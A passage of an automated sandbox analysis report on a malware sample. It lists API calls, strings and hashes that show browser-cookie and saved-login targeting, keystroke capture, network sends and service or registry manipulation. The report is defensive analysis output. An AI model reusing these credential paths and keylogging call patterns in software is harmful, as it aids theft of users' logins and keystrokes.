                                                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                    • API String ID: 1164774033-405221262
                                                                    • Opcode ID: f90065989bd0a17b5831e324ce2d97d5a1a4d1f717e926d9710681c32acded44
                                                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                    • Opcode Fuzzy Hash: f90065989bd0a17b5831e324ce2d97d5a1a4d1f717e926d9710681c32acded44
                                                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                    • String ID:
                                                                    • API String ID: 2341273852-0
                                                                    • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                    • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                                                    • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                                                    • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                    • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                    • String ID:
                                                                    • API String ID: 1888522110-0
                                                                    • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                    • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                    • API String ID: 2127411465-314212984
                                                                    • Opcode ID: 740b41f1301d900cd575cbd39ac843d4eb49c9ab671b46edb0516f3bcd21c953
                                                                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                    • Opcode Fuzzy Hash: 740b41f1301d900cd575cbd39ac843d4eb49c9ab671b46edb0516f3bcd21c953
                                                                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00449212
                                                                    • _free.LIBCMT ref: 00449236
                                                                    • _free.LIBCMT ref: 004493BD
                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                    • _free.LIBCMT ref: 00449589
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                    • String ID:
                                                                    • API String ID: 314583886-0
                                                                    • Opcode ID: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                    • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                    • Opcode Fuzzy Hash: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                    • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00408811
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                    • String ID: hdF
                                                                    • API String ID: 1771804793-665520524
                                                                    • Opcode ID: 46d09d0c063bf08bb466b0fb28ceb1405a4f0be66e01fa49ff8e50cf61fc7896
                                                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                    • Opcode Fuzzy Hash: 46d09d0c063bf08bb466b0fb28ceb1405a4f0be66e01fa49ff8e50cf61fc7896
                                                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                    APIs
                                                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                    • API String ID: 1589313981-2876530381
                                                                    • Opcode ID: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
                                                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                    • Opcode Fuzzy Hash: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
                                                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP$['E
                                                                    • API String ID: 2299586839-2532616801
                                                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                    APIs
                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                    • GetLastError.KERNEL32 ref: 0040BA58
                                                                    Strings
                                                                    • UserProfile, xrefs: 0040BA1E
                                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                    • API String ID: 2018770650-1062637481
                                                                    • Opcode ID: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
                                                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                    • Opcode Fuzzy Hash: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
                                                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                    • GetLastError.KERNEL32 ref: 0041799D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 3534403312-3733053543
                                                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                                                    • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                                                    • Opcode Fuzzy Hash: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                                                    • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00409258
                                                                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,007521A8,00000010), ref: 004048E0
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                    • String ID:
                                                                    • API String ID: 1824512719-0
                                                                    • Opcode ID: 4aa131201063ea3f0714f5d7089c804073cd2f94ec36660219c5ad3862e45934
                                                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                    • Opcode Fuzzy Hash: 4aa131201063ea3f0714f5d7089c804073cd2f94ec36660219c5ad3862e45934
                                                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                    • String ID:
                                                                    • API String ID: 276877138-0
                                                                    • Opcode ID: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                    • Opcode Fuzzy Hash: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
